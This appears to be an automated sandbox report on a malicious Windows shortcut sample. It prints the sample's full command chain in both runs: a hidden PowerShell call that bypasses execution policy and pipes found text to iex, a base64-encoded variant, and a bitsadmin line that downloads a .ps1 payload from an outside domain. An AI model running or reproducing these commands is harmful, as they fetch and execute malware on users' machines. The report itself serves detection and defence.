Malware Analysis Report

2025-04-14 03:26

Sample ID 240612-sj1spstbrl
Target a11a90303a1542f465542239afc4ea60_JaffaCakes118
SHA256 8d7de3083012dd352a020eee216a6acdf08aed1a1f69cce481f7353274e4c82c
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

8d7de3083012dd352a020eee216a6acdf08aed1a1f69cce481f7353274e4c82c

Threat Level: Likely malicious

The file a11a90303a1542f465542239afc4ea60_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

execution

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Enumerates physical storage devices

Download via BitsAdmin

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 15:10

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 15:10

Reported

2024-06-12 15:12

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

150s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\a11a90303a1542f465542239afc4ea60_JaffaCakes118.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\a11a90303a1542f465542239afc4ea60_JaffaCakes118.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -eP ByPass -nonI -c "&{powershell -wi"N "hi"dDen -c {$b7oc=findstr /s mrildkpased c:\users\*.lnk; "$b7oc" | iex}}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -wiN hidDen -encodedCommand JABiADcAbwBjAD0AZgBpAG4AZABzAHQAcgAgAC8AcwAgAG0AcgBpAGwAZABrAHAAYQBzAGUAZAAgAGMAOgBcAHUAcwBlAHIAcwBcACoALgBsAG4AawA7ACAAJABiADcAbwBjACAAfAAgAGkAZQB4AA== -inputFormat xml -outputFormat text

C:\Windows\system32\findstr.exe

"C:\Windows\system32\findstr.exe" /s mrildkpased c:\users\*.lnk

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\\d & bitsadmin /transfer mrildkpased /download /priority FOREGROUND "https://internetmarketing4pros.com/marco/pro" C:\Users\Admin\AppData\Roaming\\vWjXOBtIxaArTN.ps1 & del C:\Users\Admin\AppData\Roaming\\d & exit

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mrildkpased /download /priority FOREGROUND "https://internetmarketing4pros.com/marco/pro" C:\Users\Admin\AppData\Roaming\\vWjXOBtIxaArTN.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 internetmarketing4pros.com udp
US 8.8.8.8:53 internetmarketing4pros.com udp

Files

memory/664-2-0x00007FF84DBE3000-0x00007FF84DBE5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qlcftper.bt5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/664-12-0x00000285713C0000-0x00000285713E2000-memory.dmp

memory/664-13-0x00007FF84DBE0000-0x00007FF84E6A1000-memory.dmp

memory/664-14-0x00007FF84DBE0000-0x00007FF84E6A1000-memory.dmp

memory/664-25-0x00007FF84DBE0000-0x00007FF84E6A1000-memory.dmp

memory/664-26-0x00007FF84DBE0000-0x00007FF84E6A1000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 15:10

Reported

2024-06-12 15:12

Platform

win7-20240221-en

Max time kernel

119s

Max time network

119s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\a11a90303a1542f465542239afc4ea60_JaffaCakes118.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2152 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 2792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 2792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 2792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2792 wrote to memory of 2476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\findstr.exe
PID 2792 wrote to memory of 2476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\findstr.exe
PID 2792 wrote to memory of 2476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\findstr.exe
PID 2792 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2792 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2792 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2988 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2988 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2988 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\a11a90303a1542f465542239afc4ea60_JaffaCakes118.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -eP ByPass -nonI -c "&{powershell -wi"N "hi"dDen -c {$b7oc=findstr /s mrildkpased c:\users\*.lnk; "$b7oc" | iex}}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -wiN hidDen -encodedCommand JABiADcAbwBjAD0AZgBpAG4AZABzAHQAcgAgAC8AcwAgAG0AcgBpAGwAZABrAHAAYQBzAGUAZAAgAGMAOgBcAHUAcwBlAHIAcwBcACoALgBsAG4AawA7ACAAJABiADcAbwBjACAAfAAgAGkAZQB4AA== -inputFormat xml -outputFormat text

C:\Windows\system32\findstr.exe

"C:\Windows\system32\findstr.exe" /s mrildkpased c:\users\*.lnk

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\d & bitsadmin /transfer mrildkpased /download /priority FOREGROUND "https://internetmarketing4pros.com/marco/pro" C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\AxHMdTVikEOCgb.ps1 & del C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\d & exit

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mrildkpased /download /priority FOREGROUND "https://internetmarketing4pros.com/marco/pro" C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\AxHMdTVikEOCgb.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 internetmarketing4pros.com udp

Files

memory/2612-38-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp

memory/2612-39-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

memory/2612-41-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2612-42-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2612-43-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2612-40-0x0000000001F30000-0x0000000001F38000-memory.dmp

memory/2612-44-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2612-45-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2612-51-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2612-52-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp